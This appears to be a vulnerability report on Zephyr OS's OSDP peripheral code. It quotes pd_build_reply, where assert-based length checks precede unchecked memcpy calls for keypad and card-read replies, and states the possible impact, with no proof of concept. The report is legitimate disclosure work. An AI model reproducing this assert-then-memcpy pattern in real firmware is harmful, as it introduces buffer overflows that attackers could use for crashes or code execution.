Buffer overflows due to assert in /subsys/mgmt/osdp/src/osdp\_pd.c:

static int pd\_build\_reply(struct osdp\_pd \*pd, uint8\_t \*buf, int max\_len)
{
	int ret \= OSDP\_PD\_ERR\_GENERIC;
	int i, len \= 0;
	struct osdp\_cmd \*cmd;
	struct osdp\_event \*event;
	int data\_off \= osdp\_phy\_packet\_get\_data\_offset(pd, buf);
#ifdef CONFIG\_OSDP\_SC\_ENABLED
	uint8\_t \*smb \= osdp\_phy\_packet\_get\_smb(pd, buf);
#endif
	buf += data\_off;
	max\_len \-= data\_off;

	switch (pd\->reply\_id) {
...
	case REPLY\_KEYPPAD:
		event \= (struct osdp\_event \*)pd\->ephemeral\_data;
		assert\_buf\_len(REPLY\_KEYPAD\_LEN + event\->keypress.length, max\_len); /\* VULN: assert \*/
		buf\[len++\] \= pd\->reply\_id;
		buf\[len++\] \= (uint8\_t)event\->keypress.reader\_no;
		buf\[len++\] \= (uint8\_t)event\->keypress.length;
		memcpy(buf + len, event\->keypress.data, event\->keypress.length); /\* VULN: buffer overflow \*/
		len += event\->keypress.length;
		ret \= OSDP\_PD\_ERR\_NONE;
		break;
	case REPLY\_RAW: {
		int len\_bytes;

		event \= (struct osdp\_event \*)pd\->ephemeral\_data;
		len\_bytes \= (event\->cardread.length + 7) / 8;
		assert\_buf\_len(REPLY\_RAW\_LEN + len\_bytes, max\_len); /\* VULN: assert \*/
		buf\[len++\] \= pd\->reply\_id;
		buf\[len++\] \= (uint8\_t)event\->cardread.reader\_no;
		buf\[len++\] \= (uint8\_t)event\->cardread.format;
		buf\[len++\] \= BYTE\_0(event\->cardread.length);
		buf\[len++\] \= BYTE\_1(event\->cardread.length);
		memcpy(buf + len, event\->cardread.data, len\_bytes); /\* VULN: buffer overflow \*/
		len += len\_bytes;
		ret \= OSDP\_PD\_ERR\_NONE;
		break;
	}
	case REPLY\_FMT:
		event \= (struct osdp\_event \*)pd\->ephemeral\_data;
		assert\_buf\_len(REPLY\_FMT\_LEN + event\->cardread.length, max\_len); /\* VULN: assert \*/
		buf\[len++\] \= pd\->reply\_id;
		buf\[len++\] \= (uint8\_t)event\->cardread.reader\_no;
		buf\[len++\] \= (uint8\_t)event\->cardread.direction;
		buf\[len++\] \= (uint8\_t)event\->cardread.length;
		memcpy(buf + len, event\->cardread.data, event\->cardread.length); /\* VULN: buffer overflow \*/
		len += event\->cardread.length;
		ret \= OSDP\_PD\_ERR\_NONE;
		break;
...

**PoC**

I haven't tried to reproduce these potential vulnerabilities against a live install of the Zephyr OS.

**Impact**

If the unchecked inputs above are attacker-controlled and cross a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

Tag

#buffer_overflow